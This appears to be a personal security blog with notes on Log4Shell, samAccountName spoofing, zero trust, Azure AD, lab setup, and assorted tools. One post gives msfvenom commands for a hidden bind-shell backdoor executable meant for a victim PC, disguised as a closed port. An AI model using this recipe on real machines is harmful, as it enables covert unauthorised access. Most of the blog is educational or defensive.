Multi-Layered Approach

An excellent webcast from Eran Livne (Qualys) about Multi-layered Approach to address Log4Shell vulnerabilities. Watch the on-demand webcast if you want. 

There is also a great demo on how to use multi-layered approach with Qualys to perform log4shell assessment (remote scan, auth scan, agent, inventory scan, prioritize, externally expose/shodon, container, images, patch management, mitigation action, EDR).

My quick notes:

1. See what your attackers see
2. Find where you are vulnerable
• Vulnerability scan
•  In-depth vulnerability scan
• Inventory scan
• Protect your container/image
  
3. Remediation based on priorities
4. Monitor for attack in progress

Links:

• https://www.qualys.com/log4shell-cve-2021-44228/
  
• https://github.com/Qualys/log4jscanlinux
• https://github.com/Qualys/log4jscanwin
  

Lab21 Architecture Design

I have been deciding on the virtualization tools for my Lab21 between VMWare Player and VirtualBox. Both have advantages on their own. 

There are 3 types of networking in virtualization tools: NAT, host-only, and bridged.

1. NAT - Most commonly used. 
2. Host-only - Mostly for private used.
3. bridged - For advanced user only.
   

While doing my research on which tools to use, I come across an interesting video run OpenWrt router image on a VirtualBox with "host-only + bridged" environment. 

After watching the video, it gives me more ideas about how to design Lab21 architecture.

Links:

• OpenWrt on VirtualBox HowTo
• OpenWrt on x86 hardware
• https://downloads.openwrt.org/releases/21.02.1/targets/x86/64/ 
  

Log4Shell at Christmas Eve

A quick summary for Log4Shell issue at Christmas eve.

• Log4j Zero-Day - Log4Shell
• Log4Shell Mitigation Guide 
• Live Patch Log4Shell
• Log4Shell 2.0 

 

Weaponise Exploits for samAccountName Spoofing (CVE-2021–42278) & Domain Controller Impersonation (CVE-2021–42287)

Exploit to impersonate from regular domain user released!

Microsoft released patches to address two (2) vulnerabilities that affect Windows Active Directory domain controllers: samAccountName Spoofing and Domain Controller Impersonation in November 2021. 

Both vulnerabilities, samAccountName Spoofing (CVE-2021–42278) & Domain Controller Impersonation (CVE-2021–42287), allow an adversary with access to low-privileged domain user credentials, to obtain a Kerberos Service Ticket for Domain Controller computer account. This will effectively allows a regular domain user to take control of a domain controller.

Mitigation / Detection

It is recommended to install the Microsoft patch (KB5008602) to mitigate against this attack. This patch fixes the issue with PAC confusion and S4U2self created earlier.

Another way is, setting the Machine Account Quota to 0 is also a quick fix for stopping low privileged user from being able to create machine accounts. Other than that, removing Authenticated Users from SeMachineAccountPrivilege and adding Domain Admins or another group of allowed accounts.

Links:

• Hunting for samAccountName Spoofing (CVE-2021–42278) & Domain Controller Impersonation (CVE-2021–42287)
• CVE-2021-42287/CVE-2021-42278 Weaponisation 
• https://github.com/WazeHell/sam-the-admin
  

Log4j Scanner

By now, everyone should have heard of the log4j RCE vulnerabilities (cve-2021-44228 and cve-2021-45046 and cve-2021-45105).

There is a opensource scanner released by CISA through collaboration with broader cybersecurity community called "Log4j Scanner".

Other than CISA, Metasploit has added a module called Log4Shell HTTP Scanner, which capable of identifying vulnerable instances via pre-determined HTTP request injection points.

Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki, Apache OFBiz.

Links:

• https://github.com/cisagov/log4j-scanner
• https://www.rapid7.com/db/modules/auxiliary/scanner/http/log4shell_scanner/  
• Qualys Scanner for Windows OS - Log4jScanWin.exe
  

 

Log4Shell: RCE 0-day exploit found in log4j (a Java logging package)

On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string.

Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. This exploit is also known as "Log4Shell".

The 0-day was tweeted along with a POC posted on GitHub. It has now been published as CVE-2021-44228.

More resources are available at https://log4shell.com/

Impact

Many services are vulnerable to this exploit including cloud services (Steam, Apple iCloud); apps like Minecraft, Apache Struts; and any software that embedded Log4J as logging package. 

Affected Apache Log4j Versions

From the initial investigation, almost all version of log4j v2.0 till v2.14.1 are vulnerable. And version 1 of log4j is vulnerable too.

How the exploit works

• A server with a vulnerable log4j version installed/embedded. 
• An endpoint with any protocol (HTTP, TCP) that allows attacker to send the exploit string.
• A log statement that logs out the string from the requester.
• Outgoing connection to a malicious LDAP and RMI server.
  

This means, by limiting outgoing connection, we can prevent loading the exploit and mitigating the vulnerability. However, it is not possible to just block specific ports, LDAP (389/tcp) and RMI (1099/tcp/udp). The attacker can hosts the exploit payload at any arbitrary ports.

It might be possible with application layer firewall inspection to restrict the outgoing protocols, ie LDAP and RMI should be blocked. 

Alternatively, one might deploy a HTTP proxy and restrict outgoing traffic thru the proxy only since LDAP and RMI do not work over a HTTP proxy.

What Is Zero Trust Security Architecture

Zero Trust is a shift of network defenses toward a more comprehensive IT security model that allows organizations to restrict access controls to networks, applications, and environment without sacrificing performance and user experience.

~ McAfee

Nowadays, many organizations are adopting Zero Trust (ZT) as an element of their trust network architecture and enterprise security.

ZT is a model which can be simply applied to:

• network architecture
• authentication and authorization architecture
  
• cloud and container architecture 

 

Three (3) Approaches to Zero Trust Architecture:

• Enhanced Identity Governance (with MFA)
  
• Micro-segmentation
• Network infrastructure and software-defined perimeters

 

Zero Trust Access (ZTA) Vs. Zero Trust Network Architecture (ZTNA)

ZTA relies on the organization’s Identity and Access Management (IAM) policies, often requiring MFA as a way to verify that they are who they say they are. Additionally, ZTA usually includes maintaining a continuous inventory of devices and users connecting to the network while continuously scanning for new access.

While ZTA focuses on who and what connects to a network, ZTNA focuses on who and what can connect to applications located on the network. ZTNA places the applications behind a gate called a “proxy point,” creating a secure, encrypted tunnel that data travels across. This makes it easier to secure remote users and entities without having to use a VPN.

Five use cases for zero trust:

1. Enterprise satellites
2. Multi-cloud architecture
3. Managing third-party, non-employee access
4. Across enterprise boundaries
5. Customer-facing services
   

(Residual) Risks to Zero Trust:

• Component Configuration
  
• Denial of Service (DoS) Attack
• Stolen Credential

 

Links:

• https://www.mcafee.com/enterprise/en-us/security-awareness/cloud/what-is-zero-trust.html
• https://securityscorecard.com/blog/what-is-zero-trust-architecture
• https://securityscorecard.com/blog/what-is-zero-trust-security
• Basic principles of a Zero Trust enterprise cybersecurity architecture
  

NEW Native Azure AD KERBEROS!!!

This is a short demo on showing Azure AD is supporting native Kerberos now. 

Command lines:

1. dsregcmd /status
   
2. klist 
3. klist purge
   
4. klist get krbtgt

 

Picking which Azure AD Synchronization Technology!

This is a short video to show you the difference between the 2 Azure AD sync technologies:  AAD Connect vs Cloud Sync.

Notes - 3 rules:

1. AAD Connect instance sync to a single AAD instance
2. AAD instance only sync with single AAD Connect instance
3. An object can only replicate by one sync instace

 

Links:

• Topologies for Azure AD Connect
• Azure AD Connect cloud sync supported topologies and scenarios
• Comparison between Azure AD Connect and cloud sync
• https://practical365.com/how-to-decide-between-azure-ad-connect-and-azure-ad-connect-cloud-sync/ 
  

Mouse Jiggler

With the idea from HakByte, we wrote a similar small python utils and convert it o Windows EXE. 

This is mouse jiggler tool which prevents it from falling asleep by moving the mouse to simulate human input (bypass screensaver locking).

Then I just convert it to Windows executable with pyinstaller.

pyinstaller --onefile --noconsole mouse_jiggler.py

pyinstaller --onefile -w -f  mouse_jiggler.py

Links:

• Mouse Jiggler - https://github.com/myseq/utils
  

Linux OS for Lab21

I have shortlisted a few Linux distributions for Lab21 project. Namely a few are:

• Ubuntu Desktop 20.04
• Ubuntu Server 20.04
• AlmaLinux 8.5
• Rocky Linux 8.5

Other Linux distribution that are still under consideration:

• Kali Linux
• Fedora Linux
• Centos Linux
  

Virtualization options:

• VMWare Workstation for Player
• VirtualBox
  

OpenShift and Kubernetes

 

These are the 2 videos that can explain quickly about what Kubernetes and OpenShift is.

Start of Lab21 Project

Today, I start my "Lab-21" project.

All the information will be documented at GitHub repository "Lab21". 

Links:

• https://github.com/myseq/Lab21
  

Network Forensic Analysis Tool (NFAT)

BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). 

It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords fo offline Brute Force attack.

Two (2) BruteShark versions are available, A GUI based application (Windows) and a Command Line Interface tool (Windows and Linux).

BruteSharkCLI

Links:

• Install Mono - https://linuxize.com/post/how-to-install-mono-on-ubuntu-20-04/
• BruteShark - https://github.com/odedshimon/BruteShark
• https://hakin9.org/brute-shark-a-network-analysis-tool/
  

Run Python Code on WhatsApp

Ever thought of running simple python code on your WhatsApp (mobile phone). 

In this tutorial we will see how can the author convert the regular whatsapp chats to python code and execute them on whatsapp. This project is a small IDE which runs on whatsapp and can do all the functionalities of python on whatsapp.

In the full tutorial, the author will be creating a bot to run python codes on WhatsApp. It will be kind of creating his own code editor.

Links:

• Full Tutorial - https://www.youtube.com/watch?v=hW3zfd0mIfw
• Python on WhatsApp - https://github.com/pyGuru123/Python-on-WhatsApp
  

IT vs. OT - What is OT and how is it different from IT

 

IT vs. OT

 In this video, James Cabe and Anthony Bartolo as they discuss how Microsoft is approaching cybersecurity for Industry 4.0 using Azure Defender for IoT, including:

• learn about the differences between Operational Technology (OT) and Industrial Control Systems (ICS)
• gain an understanding of how this compares to the modern Internet of Things (IoT)
• the challenges of securing OT networks
•  how ladder logic can cause cascading impacts
•  how to use the Purdue model to help with communications between the IT and OT security teams as they build a cohesive end-to-end protection solution for modern cyber attacks

 

Links:

• https://www.youtube.com/watch?v=TliTTBi6Do8
  

Windows Shellcode Behind Closed Port

This is a simple tactic to hide a TCP shellcode for Windows platform. 

With msfvenom, generate a payload for victim PC (Windows machine) utilizing shell_hidden _bind_tcp and output a file with .exe format.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=[TCP_Port] -f exe > file.exe

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.203 lport=4321 -f exe > file.exe

This hidden Bind TCP shell listens for connections from the host’s IP address (Ahost) and responds with an RST packet to other connections. It makes the port appear closed, allowing us to disguise the Shellcode.

With netstat, the port will appear as LISTENING. However, when scanning the port with any scanner, we will get "closed" state. To connect the the backdoor (from the Ahost IP address), use netcat.

Below is the description at Rapid7.

Description

Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.

Author(s)

    vlad902 <vlad902@gmail.com>
    sd
    Borja Merino <bmerinofe@gmail.com>

Platform

Windows

Architectures

x86

Links:

• https://www.hackingarticles.in/metasploit-for-pentester-windows-hidden-bind-shell/
• https://www.ehacking.net/2021/10/how-to-hide-shellcode-behind-closed-port.html
• https://www.rapid7.com/db/modules/payload/windows/shell_hidden_bind_tcp/
  

Abhinavsingh Proxy.py

Do you need a lightweight proxy server that support HTTP/HTTPS/HTTP2/WebSockets, to facilitate end-to-end testing?

Here's a stripped-down version of lightweight proxy server (written in Python).

 

Summary:

• Fast and scalable and lightweight
  
• Programmable (with plugins)
  
• Real time dashboard
• Supports: HTTP (1.0, 1.1, 2.0), HTTPS and websockets
• IPv4 and IPv6 support
• Basic authentication support

 

Links:

•  https://github.com/abhinavsingh/proxy.py
  

Azure Stormspotter

 

StormSpotter

A visualization pentest tool for Azure subscription.

Stormspotter creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.

You can run it with or without docker. Just follow the instruction at https://github.com/Azure/Stormspotter

 

Guide and Tools for AD Kill Chain Attack & Defense

Tushar is kind enough to compile a complete guide and tools for Active Directory kill chain attack and defense. 

It covers the tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise AD and guidance to mitigation, detection, and prevention. 

1. Discovery
2. Privilege Escalation
3. Domain Trusts
4. Lateral Movement
5. Defense Evasion
6. OpSec
7. Credential Dumping
8. Persistence
9. Tools, Scripts, eBooks, Cheatsheets
10. Defense and Detection
11. Active Directory Security Checks

Links:

• https://cybersecuritynews.com/active-directory-checklist/ 
  

Consistent network interface device naming

Ever wondering why the traditional network interface naming such as eth0 is renamed as ens33 nowadays?

This is known as Predictable Network Interface naming and is part of systemd/udev, since v197. 

In the past, UNIX naming scheme probe for hardware occurs in no particular order and may change between reboots. Ever since systemd v197, the interface name depens on the physical location of hardware and can be predicted/guessed by looking at lspci or lshw output.  This can have serious security implications, for example in firewall rules which are coded for certain naming schemes, and which are hence very sensitive to unpredictable changing names.

With systemd 197 there are different naming policies added into systemd/udevd by default. The following different naming schemes for network interfaces are now supported by udev natively:

1. Names incorporating Firmware/BIOS provided index numbers for on-board devices (example: eno1)
2. Names incorporating Firmware/BIOS provided PCI Express hotplug slot index numbers (example: ens1)
3. Names incorporating physical/geographical location of the connector of the hardware (example: enp2s0)
4. Names incorporating the interfaces's MAC address (example: enx78e7d1ea46da)
5. Classic, unpredictable kernel-native ethX naming (example: eth0)

By default, systemd v197 will now name interfaces following policy 1) if that information from the firmware is applicable and available, falling back to 2) and subsequently 3) 4) 5).

 

Below is the network interface naming hierarchy captured from RedHat Enterprise website.

Network interface device naming hierarchy

When consistent device naming is enabled (default), the udev device manager generates device names based on the following schemes:

Scheme	Description	Example
1	Device names incorporate firmware or BIOS-provided index numbers for onboard devices. If this information is not available or applicable, udev uses scheme 2.	eno1
2	Device names incorporate firmware or BIOS-provided PCI Express (PCIe) hot plug slot index numbers. If this information is not available or applicable, udev uses scheme 3.	ens1
3	Device names incorporate the physical location of the connector of the hardware. If this information is not available or applicable, udev uses scheme 5.	enp2s0
4	Device names incorporate the MAC address. Red Hat Enterprise Linux does not use this scheme by default, but administrators can optionally use it.	enx525400d5e0fb
5	The traditional unpredictable kernel naming scheme. If udev cannot apply any of the other schemes, the device manager uses this scheme.	eth0

To disable "Predictable Network Interface Names" (Ubuntu):

•     Edit your /etc/default/grub changing the line from

    GRUB_CMDLINE_LINUX=""
    to
    GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"

•     and, finally update and reboot your system:

    $ sudo grub-mkconfig -o /boot/grub/grub.cfg
  $ sudo update-grub && sudo reboot

Links:

• https://systemd.io/PREDICTABLE_INTERFACE_NAMES/
• Consistent network interface device naming
• https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/
  
• https://major.io/2015/08/21/understanding-systemds-predictable-network-device-names/
  

Presentation from Command Line

Today, I'm going to share my view on those command line presentation tools that I tried. 

Good and bad with command line presentation tools.

- Cannot never win any design award.
- fonts might be too small.
+ help to FOCUS.

 

mdp - Markdown Presentation

• uses single markdown text file.
• can be converted to HTML and PDF (with additional tools).
  

tpp - Text Presentation Program

• uses own formatting (instead of markdown).
• colorful

 

vimdeck - VIM as a presentation tool

• uses makrdown + ruby + SyntaxRange
  
• supports H1/H2/Images (to ascii), and fenced code blocks.
• supports highlighting syntax.
  

vtmc - Video Terminal Master of Ceremonies

• uses node.js (javascript) + multiple text files (stored at a folder).
• uses custom formatting.
  
• same author as https://github.com/jclulow/terminal-heatmap
  

 

tkn - Terminal Keynote

• uses ruby and png files.
• supports code, center, block, image, section.
• can be converted to PDF.

 

tiptip - Terminal Plain-text Presentations

• uses CoffeeScript.
  

 

patat - Presentation Atop The ANSI Terminal

• uses pandoc (markdown/LaTeX) to parse the slides.
• largely based upon MDP and VTMC
• support different running options.
• support YAML configuration (at 2 places).
  

 

 lookatme - LookAtMe

• uses markdown notation.
• supports live code, images, 
• live terminal.
• options for different types of rendering. 

 

Links:

• mdp - https://github.com/visit1985/mdp
• tpp - https://synflood.at/tpp.html
• vimdeck - https://github.com/tybenz/vimdeck
• vtmc - https://github.com/jclulow/vtmc
• vtmc_box - https://github.com/justin2004/vtmc_box
• tkn - https://github.com/fxn/tkn
• tiptip - https://github.com/felixrabe-attic/mcrio--tiptip
• patat - https://github.com/jaspervdj/patat
• lookatme - https://github.com/d0c-s4vage/lookatme
  

Side-by-Side Comparison with Linux command

"sdiff" a very useful utility to compare the result side-by-side.  For example, I can compare the output of the 2 nmap results as below:

 $ sdiff -bW <(nmap -sV -p 80 192.168.31.1) <(nmap -sV -p 80 192.168.1.254) 

Comparing port 80

A more complex example, such as:

$ sdiff -bW <(nmap --script ssh2-enum-algos -sV -p 22 23.96.21.205 -Pn) <(nmap --script ssh2-enum-algos -sV -p 22 127.0.0.1)